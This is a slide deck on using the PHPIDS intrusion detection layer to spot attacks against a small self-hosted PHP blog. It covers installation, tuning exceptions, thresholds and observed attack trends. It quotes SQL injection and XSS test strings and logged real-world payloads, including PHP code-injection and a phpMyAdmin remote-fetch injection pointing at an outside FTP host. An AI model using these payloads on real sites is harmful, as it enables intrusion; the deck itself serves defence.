View
218
Download
2
Category
Preview:
Citation preview
Using PHPIDS to Understand Attacks Trends
@grecs
Infosec Career Start - WebAppSec
• Around 2002 • Sooo Much Simpler
– No CSRF, Click-Jacking, … SQLi – No SOAP – No AJAX – No HTML5
• Had Our Problems – Browser Wars Still Going On – Per Browser Customizations – No Guidance – Limited Security Libraries – Immature Tools
Pic of hacked sites; news articles of breaches, mid-2000s
Infosec COTS
Agenda
• Introduction • Why Use PHPIDS? • What Is PHPIDS? • Installation • Maintenance & Operations • Performance Issues • Bypassing • Detection Trends • Use Within Other Tools • Conclusion
Introduction
• Understand What People Could Be Hitting Site With • Not Many Security Log Parsing Scripts • Just Look Through & Look for “Things”
– Only GET-Based Attacks Recorded
• Possible Tools for Monitoring – Simple Log Watcher (SWATCH) – PHPIDS
• PHPIDS – Open Source – Awesome Software – Little Documentation for Lay Tech Person Like Myself – Took Few Hours to Figure Out Ins & Outs (many more later to tweak,
maintain, & really understand it) – Wanted to Document for Others to Use
Why Use PHPIDS?
• Mom & Pop Self-Hosted Blog • $10/mo Shared Hosting Plan • Limited Web Server Access/Control
– Nothing at Network Level • NIDS (e.g., Snort)
– Nothing at OS Level – Nothing at Web Server Level
• WAF (e.g., modSecurity)
– Limited at PHP Level • No Configs Control (php.ini) • Full Control of PHP Written Code
• Forget Big Vendor $50K Software or Hardware Appliance
What Is PHPIDS?
• Definition
• Architecture
• Operational Flow
• Detection Mechanisms
What Is PHPIDS? Definition
PHPIDS (PHP-Intrusion Detection System) is a simple to use, well structured, fast and state-of-the-art security layer for your PHP based
web application. The IDS neither strips, sanitizes nor filters any malicious input, it simply recognizes when an attacker tries to break
your site and reacts in exactly the way you want it to. Based on a set of approved and heavily tested filter rules any attack is given a numerical
impact rating which makes it easy to decide what kind of action should follow the hacking attempt. This could range from simple
logging to sending out an emergency mail to the development team, displaying a warning message for the attacker or even ending the
user’s session.
PHPIDS enables you to see who’s attacking your site and how and all without the tedious trawling of logfiles or searching hacker forums for
your domain. Last but not least it’s licensed under the LGPL!
What Is PHPIDS? - Architecture
What Is PHPIDS? – Operational Flow
Email Database
What Is PHPIDS? Detection Mechanisms • Anti-Evasion Normalizations
– Converter.php
• Signatures – default_filter.xml
• Centrifuge – Incoming Strings > 25 Characters
– Ratio = Count of Word Characters, Spaces, Punctuation / Non-Word Characters
– Lower the Ratio ~ Greater Probability of Attack
– Normal = 7.5; Attack Trigger < 3.5
Installation
• Install Code
• Create Reference File
• Include Reference File
• Verify Working
• Prepare for Production
Installation Install Code • Web Host
– No Access to Recommended /var/lib Directory
– Create “applications” Folder Off User’s Home Directory
– Could Put in WWW Directory If Don’t Use DB Logging
– Most Recommend Keeping Out of Web Root
• Upload & Unzip into Directory Outside of Web Root – ./applications/phpids-0.7
– Keep Version Numbers for Easy Upgrades/Reverts
Installation Create Reference File
• Create phpids.php File in Website’s Root
• Base on “phpids-0.7/docs/examples/example.php”
• Change Path References to PHPIDS Installation – Just Three Lines
• Verify Permissions to 644
First Change // set the include path properly for PHPIDS … . ‘/home/[user]/applications/phpids-x.x/lib’ Second Change /* * It’s pretty easy to get the PHPIDS running * 1. Define what to scan … $init = IDS_Init::init(‘/home/[user]/applications/phpids-x.x/lib/IDS/Config/Config.ini.php’); Third Change /** * You can also reset the whole configuration * array or merge in own data … $init->config['General']['base_path'] = ‘/home/[user]/applications/phpids-x.x/lib/IDS/’;
Installation Include Reference File
• Include phpids.php in Template Files
• After Header Call
– header.php
• <?php include ‘phpids.php’; ?>
Installation Other Tweaks
• Email Detections
– recipients[] = [email here]
• Exceptions
Installation Verify Working
Installation Verify Working
Installation Verify Working
Legend CSRF: Cross-Site Request Forgery DT: Dir Traversal ID: Info Disclosre LFI: Loc File Inclu RFE: Remote File Exe SQLI: SQL Inject XSS: Cross-Site Script
Installation Verify Working
• Verify Logged
“a.b.c.d",2012-04-05T19:20:03+00:00,26,"sqli id lfi","REQUEST.test%3D%255C%2522aaa%255C%2522%2520or%25201%253D1%253B+GET.test%3D%255C%2522aaa%255C%2522%2520or%25201%253D1%253B","%2F%3Ftest%3D%2522aaa%2522%2520or%25201%3D1%3B",”e.f.h.i” REQUEST=\"aaa\" or 1=1;
Installation Verify Working
• Additional Examples To Try
– ?test=’%20OR%201=1--
– ?test=”>XXX
• Cleanup phpids.php • Comment Out
– Initial Echo – Commands that Show It
Detected an Attack
• Optional – Remove All Folders in PHPIDS
Directory Except for “./phpids-0.7/lib/IDS”
• Final Test – Previous Slides
Installation Prepare for Production
Installation Prepare for Production
… /* echo $result; */ … /* require_once ‘IDS/Log/Database.php’; */ … /* IDS_Log_Database::getInstance($init) */ … } /* else { echo ‘<a href=”?test=%22><script>eval(window.name)</script>”>No attack detected – click for an example attack</a>’; } */ …
Maintenance & Operations
• Calibrating Installation
• Updating Signatures
• Keeping Attackers Away
• Adding Thresholds
Maintenance & Ops Calibrating Installation • Lots of Google Analytics Cookie
False Positives
– Add Exceptions to Config
– Comes with Two Related Amazon Exceptions ~ GET
– Add New Under Two Default Exceptions • exceptions[] = COOKIE.__utmz
“x.x.x.x,yyyy-mm-ddT19:31:03-05:00,12,”xss csrf id rfe lfi”,”COOKIE.__utmz=123456789.1234567890.1.1.utmcsr%3Dgoogle%7Cutmccn%3D%28organic%29%7Cutmcmd%3Dorganic%7Cutmctr%3DNOVA%20cyber%20defense”,”%2F2009%2F10%2F16%2Fin-focus-advertise-with-us%2F”,”xx.x.xxx.xxx”
Maintenance & Operations Calibrating Installation • Lived with For Awhile But • Still Lots of False Positives
– Get Feel for What Install Pickings Up – Slowly Tweak Exceptions to Meet Needs
• ColdFusion Cookies Plaguing Me? – exceptions[] = COOKIE.CFGLOBALS
• Others Google Analytics? – GET, POST, REQUEST, & COOKIE Methods – .utmz and .utmc
• Exception for All COOKIE Methods? • Recommend Using Minimum Necessary
Maintenance & Ops Updating Signatures • Signature Based Keep Up to
Date • Download from PHPIDS.org &
Overwrite – default_filter.xml – Converter.php
• Every 2 or 3 Months • Upgrading PHPIDS Software
– Install in Peer Folder • phpids-0.8
– Point phpids.php Paths to New Version
Maintenance & Ops Keeping Attackers Away • Simple Impact Threshold
Blocking • phpids.php
– if (!$result->isEmpty()) {}
– if (!$result->isEmpty()) {die(‘<h1>Go away!</h1>’);}
• Risk Turning FPs Away • Set Threshold for “die”
Statement – if ($result->getImpact() >= 50) {
die(‘<h1>Go away!</h1>’); }
Maintenance & Operations Adding Thresholds
• Only Alert by Email If Impact above Certain Level
• Suggested – Logging to File >= 10
– Logging to DB >= 25
– Report by Email >=50
– Stop Loading Page >= 100 (die($msg))
• CakePHP Example Provides Relatively Complex Code for Thresholding for IDS Reactions
Maintenance & Ops Adding Thresholds • phpids.php
– From: if (!$result->isEmpty()) {}
– Replaced Below to Be Conditional • “$compositeLog-
>addLogger(IDS_Log_Email::getInstance($init) .. <stuff I commented out> ..);”
• if ($result->getImpact() >= 25) { <the above compositeLog code> }
Performance Issues
• Lots of Contention
• Some Say No Effect
• Others Say Big Effect
• IronGeek Used but Removed
Performance Issues
• Developer Profiled CakePHP 1.1 in 3/2008
• Xdebug Profiler Output in KCachegrind
0.54%
Performance Issues
• Pingdom.com
– Website Uptime & Performance Monitoring
– Response Time
10 Sites Globally 1145 ms
Performance Issues
• Pingdom.com
4 Sites US 845 ms
Interesting Detections
• IP: a.b.c.d Date: 2012-01-31 Impact: 92 Affected tags: xss csrf id rfe sqli lfi Affected parameters: REQUEST.char_repl=%5C%27%7B%24%7Bdie%28eval%28base64_decode%28%24_POST%5BJUNGLIEZ%5D%29%29%29%7D%7D%5C%27%3D%3E, POST.char_repl=%5C%27%7B%24%7Bdie%28eval%28base64_decode%28%24_POST%5BJUNGLIEZ%5D%29%29%29%7D%7D%5C%27%3D%3E, Request URI: /vbseocp.php
• \'{${die(eval(base64_decode($_POST[JUNGLIEZ])))}}\'=>, POST.char_repl=\'{${die(eval(base64_decode($_POST[JUNGLIEZ])))}}\'=>
Interesting Detections
• IP: a.b.c.d Date: 2012-01-24 Impact: 44 Affected tags: xss csrf id rfe sqli lfi Affected parameters: REQUEST.configuration=a%3A1%3A%7Bi%3A0%3BO%3A10%3A%5C%22PMA_Config%5C%22%3A1%3A%7Bs%3A6%3A%5C%22source%5C%22%3Bs%3A48%3A%5C%22ftp%3A%2F%2Fu966867539%3A240790%4031.170.163.212%2F.a%2Fid.txt%5C%22%3B%7D%7D, POST.configuration=a%3A1%3A%7Bi%3A0%3BO%3A10%3A%5C%22PMA_Config%5C%22%3A1%3A%7Bs%3A6%3A%5C%22source%5C%22%3Bs%3A48%3A%5C%22ftp%3A%2F%2Fu966867539%3A240790%4031.170.163.212%2F.a%2Fid.txt%5C%22%3B%7D%7D, Request URI: /pma/scripts/setup.php
• a:1:{i:0;O:10:\"PMA_Config\":1:{s:6:\"source\";s:48:\"ftp://u966867539:240790@31.170.163.212/.a/id.txt\";}}, POST.configuration=a:1:{i:0;O:10:\"PMA_Config\":1:{s:6:\"source\";s:48:\"ftp://u966867539:240790@31.170.163.212/.a/id.txt\";}},
Interesting Detections
• IP: a.b.c.d Date: 2012-01-22 Impact: 26 Affected tags: sqli id lfi xss csrf rfe Affected parameters: REQUEST.author_name=%5Bphp%5Decho%28%5C%27Origins%5C%27.php_uname%28%29.%5C%27scanner%5C%27%29%3Bdie%28%29%3B%5B%2Fphp%5D, POST.author_name=%5Bphp%5Decho%28%5C%27Origins%5C%27.php_uname%28%29.%5C%27scanner%5C%27%29%3Bdie%28%29%3B%5B%2Fphp%5D, Request URI: /email.php
• [php]echo(\'Origins\'.php_uname().\'scanner\');die();[/php], POST.author_name=[php]echo(\'Origins\'.php_uname().\'scanner\');die();[/php],
Use within Other Tools
• PHPIDS Not Meant to Be Complete Tool • Plumbing that Other Tools Can Include to Perform More Advanced
Analysis/Capabilities – Shunning IP Addresses for Period of Time.
• WordPress – WPIDS – Abandoned? – Mute Screamer
• Others – ModSecurity (uses default filter rules) – Drupal Module – Mediawiki Extension – ZIDS (Zend framework) – px_phpids (Typo3) – Dotnetids (ASP.NET apps)
References
• Intrusion Detection For PHP Applications With PHPIDS – http://www.howtoforge.com/intrusion-detection-for-php-applications-with-phpids
• Getting Started with the PHPIDS Intrusion Detection System – http://www.h-online.com/security/features/Getting-started-with-the-PHPIDS-intrusion-
detection-system-746233.html
• PHPIDS FAQ – http://php-ids.org/faq/
• http://forum.cmsmadesimple.org/index.php?topic=12884.msg173160 • PHPIDS Install Notes
– http://www.irongeek.com/i.php?page=security/phpids-install-notes
• PHPIDS - Monitoring attack surface activity – https://docs.google.com/Doc?id=dd7x5smw_17g9cnx2cn&pli=1
• http://holisticinfosec.org/toolsmith/docs/july2008.pdf • Wikipedia
– https://en.wikipedia.org/wiki/PHPIDS
• PHPIDS Forum
Conclusion
• Security Layer for PHP Web Application Where Attacks Detected & Given Numerical Impact Rating
• Fits Mom & Pop Scenario – Normal Enterprise this Would Never Do – Part of Layered Defense
• Keep PHP Application Patched/Up to Date • PHPIDS
• Easy Installation & Maintenance • Need to Refine Over Time • Customize with Exceptions/Alert Thresholds • -Detection Trends • CMS Plugins that Provide Advanced Functionality to “Plumbing”
Contact Info
• Twitter @grecs
• Website NovaInfosecPortal.com
• Contact http://bit.ly/nispcontact
Questions?
Recommended